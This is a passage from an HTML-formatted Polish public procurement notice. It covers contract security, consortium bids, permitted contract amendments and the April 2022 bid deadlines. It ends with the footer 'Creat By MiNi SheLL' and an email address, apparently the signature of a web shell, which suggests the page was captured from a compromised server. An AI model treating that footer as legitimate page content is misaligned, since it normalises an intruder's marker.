(słownie: dwieście złotych 00/100),<br/>Dla części VII - 500,00 zł (słownie: pięćset złotych 00/100). <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku Wykonawców wspólnie ubiegających się o zamówienie (konsorcjum), każdy<br/>ztychwykonawców (członków konsorcjum) odrębnie składa oświadczenie, o którym mowa w<br/>ust.1 pkt1 Działu XIV SWZ <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający, na mocy art. 455 ustawy prawo zamówień publicznych, przewidujemożliwość<br/>dokonania następujących zmian postanowień zawartej umowy w stosunku do treścioferty<br/>Wykonawcy dotyczących:1) przedłużenia terminu realizacji przedmiotu zamówienia wzakresie<br/>niezbędnym, tzn. jedynie o okres niezbędny do ustania przeszkód w wykonaniuprzedmiotu<br/>umowy, przy czym zmiana spowodowana może być jedynie okolicznościamileżącymi wyłącznie<br/>po stronie Zamawiającego lub okolicznościami niezależnymi zarówno odZamawiającego jak i od<br/>Wykonawcy, w szczególności: opóźnieniem w pozyskiwaniu decyzjiadministracyjnych,<br/>oczekiwaniem Wykonawcy na uzgodnienia właścicieli urządzeń obcych,zmianami dokumentacji wynikającymi z bieżących<br/>uzgodnień z jednostkami decyzyjnymi,koniecznością przesunięcia<br/>terminu przekazania terenu budowy, okolicznościami zaistniałymi wtrakcie realizacji przedmiotu<br/>umowy, tj. warunkami atmosferycznymi, archeologicznymi,geologicznymi,<br/>hydrologicznymi,kolizjami z sieciami infrastruktury utrudniającymi lubuniemożliwiającymi<br/>terminowe wykonanie przedmiotu umowy, koniecznością zlecenia dodatkowych dostaw, usług<br/>lub robótbudowlanych;2) rezygnacji z wykonania czynnościprzewidzianych zakresem umowy, o<br/>ile można wyodrębnić ich wartość wraz ze skutkamiwprowadzenia takiej zmiany, w postaci<br/>odpowiedniego obniżenia wynagrodzenia Wykonawcy, wprzypadku zaistnienia okoliczności<br/>leżących po stronie Zamawiającego;3) zmiany zakresu częścizamówienia powierzonej<br/>Podwykonawcom lub zmiany Podwykonawcy w zakresie niezbędnymdo zrealizowania<br/>przedmiotu umowy zgodnie z SWZ, w przypadku zaistnienia okolicznościmających wpływ na<br/>dalszą realizację przedmiotu umowy przez Podwykonawcę;4) zmianypodmiotu trzeciego, na<br/>zdolności którego Wykonawca powoływał się składając ofertę, celemwykazania spełniania<br/>warunku kwalifikacyjnego dotyczącego wykształcenia, kwalifikacjizawodowych lub<br/>doświadczenia w zakresie niezbędnym do zrealizowania przedmiotu umowyzgodnie z SIWZ, w<br/>przypadku zaistnienia okoliczności związanych z udziałem podmiotu trzeciegow realizacji<br/>przedmiotu umowy;5) usunięcia oczywistych błędów pisarskich lub rachunkowych, atakże<br/>usunięcia zapisów, których wykonanie jest niemożliwe ze względu na obowiązująceprzepisy<br/>prawa – w zakresie, który jest niezbędny do wyeliminowania błędów; 6) wystąpieniusytuacji<br/>nadzwyczajnych typu strajki, epidemia, pandemia, stan wyjątkowy<br/>umożliwiającypodjęcie,prowadzenie lub zakończenie robót budowlanych (dostaw i usług).2.<br/>Wprowadzeniezmian, o których mowa w ust. 1 oraz zmian o których mowa w art. 455 ustawy<br/>prawozamówień publicznych, wymaga aneksu sporządzonego w formie pisemnej pod<br/>rygoremnieważności. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-04-20 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub wniosku” dostępnego na ePUAP i udostępnionego również na miniPortalu</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-04-20 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com